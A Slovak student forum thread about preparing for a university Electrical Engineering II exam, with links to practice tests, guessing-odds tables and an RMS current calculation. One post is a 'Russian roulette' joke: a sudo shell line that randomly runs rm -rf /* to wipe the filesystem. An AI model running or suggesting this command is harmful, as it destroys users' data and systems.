• Welcome to TUKE FÓRUM - Fórum pre Å¡tudentov Technickej Univerzity v KoÅ¡iciach.

ELE 2-skuska

Started by fat4l, 18.05.2007, 22:51:57

« predchádzajúce - ïal¹ie »

Final_Destructer

BTW, az teraz som sa zobudil, tak preto az teraz ten vykrik radosti... :D
Wanna get destructed?

Gaspacho

Smradek :-) gratulujem

diacon.mex

leniocka, prosim napis mi kde by som nasiel tie priklady, alebo testy co si prepocitala. By som chcel aj ja prepocitat ked sa to podari. A ak mozes tak mi ich posli na diacon.mex@gmail.com
Dakujem.

puq

keby si si presiel forum, uz som to raz pisal do tejto temy:) ale opakovanie je matka mudrosti: http://www.tuke.sk/fei-kteem/et2cv/

Quote from: diacon.mex on  01.06.2007, 15:12:28
leniocka, prosim napis mi kde by som nasiel tie priklady, alebo testy co si prepocitala. By som chcel aj ja prepocitat ked sa to podari. A ak mozes tak mi ich posli na diacon.mex@gmail.com
Dakujem.

diacon.mex

diki a este sa ta opytam, co mi staci vedie, aby som urobil opravak ? vies poradit ? A podotykam, ze typovat neviem , lebo ani jeden tip mi nevysiel. :-(

Gaspacho

Staci ti vediet elektrotechniku II + merania

JCube

sudo [ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "Alive!"

leniocka

Quote from: diacon.mex on  02.06.2007, 01:49:17
diki a este sa ta opytam, co mi staci vedie, aby som urobil opravak ? vies poradit ? A podotykam, ze typovat neviem , lebo ani jeden tip mi nevysiel. :-(

noo staci.. ale napr. co su tie testy tak nie su z trojfazovych obvodov takze to ti treba pozriet v zbierke :P ale prechodne deje, neharmonicke zdroje a dlhe vedenia su dobre :P (ale odpovede na dlhe vedenia velmi nesedia  :emot-shakehead: )

puq

ta aby si presiel ti staci vediet trojfazove 4x5bodov, neharmonicke 2x5 bodov a jeden z dlheho vedenia:) a ked chytis peknu otazku z merania budes to mat lahke:) a ja tiez neviem dobre tipovat:D za ele I a II som tipoval asi 9 otazok dokopy a uspesnost 0% :(

Quote from: diacon.mex on  02.06.2007, 01:49:17

hujer

Sance na spravny tip
Aspon spravnych odpovedi (z 13) pri absolutnom natipovani :
0 100%
1 97.62%
2 87.33%
3 66.74%
4 41.57%
5 20.6%
6 8.02%
7 2.42%
8 0.57%
9 0.0989%
10 0.0126%
11 0.001105%
12 0.000059%
13 0.000001%

puq

a pri 7 ?:) nie 13:D by ma zaujimalo aky som smoliar:)))

hujer

sance na aspon spravnych odpovedi (zo 7) :
0 100%
1 86.65%
2 55.51%
3 24.36%
4 7.06%
5 1.288%
6 0.1343%
7 0.006103%

puq

fuuuha:) 86% neprijemne no:))) sportku asi tipovat nepojdem:)

diacon.mex

Chlopi, sranda, sranda, ale prejde ked nezrobime Ele2... treba sablony, alebo aspon testy, nech to preriesime... jak by sa to dalo poriesit ? Aby sme isli viac-menej na istotu...

puq

http://www.tuke.sk/fei-kteem/et2cv/

chod na tu stranku. tam su priklady od spaldonovej, a aj testy preries si co najviac a ele II mas v suchu

Quote from: diacon.mex on  03.06.2007, 03:01:46
Chlopi, sranda, sranda, ale prejde ked nezrobime Ele2... treba sablony, alebo aspon testy, nech to preriesime... jak by sa to dalo poriesit ? Aby sme isli viac-menej na istotu...

Havran

akoze tie testy tam nechapem, tie riesene vyriesim pozrem vysledok a je to dobre, potom prepocitam ulohu pri ktorej neni postup a uz mi to nevide a pritom som to pocital tak isto
Achievement of your happiness is the only moral purpose of your life.

Final_Destructer

musis si viac verit :D
Wanna get destructed?

Gaspacho

Ta co kto idete opravovat ELE 2ku? Bo ja hej :D

McLarenPP

Quote from: Gaspacho on  14.06.2007, 18:01:39
Ta co kto idete opravovat ELE 2ku? Bo ja hej :D

ja idem. mal som na HT smolu, ze som nepozrel poriadne poruchove stavy, kvoli tomu som nespravil. Teraz viem vsetko po prechodne deje(30 bodov istych), treba mi 34 bodov = este jeden hocijaky priklad alebo otazka z merani. Nemal by to byt problem.

Gaspacho

Ta ja preratam testy co su na stranke katedry a konec...

Gaspacho

http://www.tuke.sk/fei-kteem/et2cv/nhtest.pdf

Uloha 6.3 : Jak tam ma vyjst tych 3,7??? vsetko mi vyslo ale s tymtu neviem pohnut dikes!

McLarenPP

Quote from: Gaspacho on  15.06.2007, 23:55:10
http://www.tuke.sk/fei-kteem/et2cv/nhtest.pdf

Uloha 6.3 : Jak tam ma vyjst tych 3,7??? vsetko mi vyslo ale s tymtu neviem pohnut dikes!

teraz sa mi to nechce pocitat, ale uz som to pocital asi 2-krat.
Ak si dobre spominam, malo by to byt takto:
Kedze ampermeter meria efekt. hodnotu prudu, treba vypocitat efekt. prud v obvode.
Pri jednosmernej zlozke je prud rovny I(0) = U/R = 0,5A.
Pri 1. harmonickej je to I(1) = U(1) / Z(1)
Pri 3. harmonickej I(3) = U(3) / Z(3)
Potom vypocitas efektivnu hodnotu prudu ako odmocnina z I(0) na druhu + I(1) na druhu delene odmocnina z 2 + I(3) na druhu delene odmocnina z 2.
A malo by to vyjst. :)

Gaspacho

jaaaj hej jasne uz to mam dik ;-) som zabudol ze to meria efektivnu, dik!

Final_Destructer

Achhh... Ako je vonku kraaaasne  :h_azn:
Wanna get destructed?

Gaspacho

Bodaj si zhnil tam de ides ... budem mysliet na teba jak tam budes makat jak drak zatial co ja budem valat sunky na hodokvase!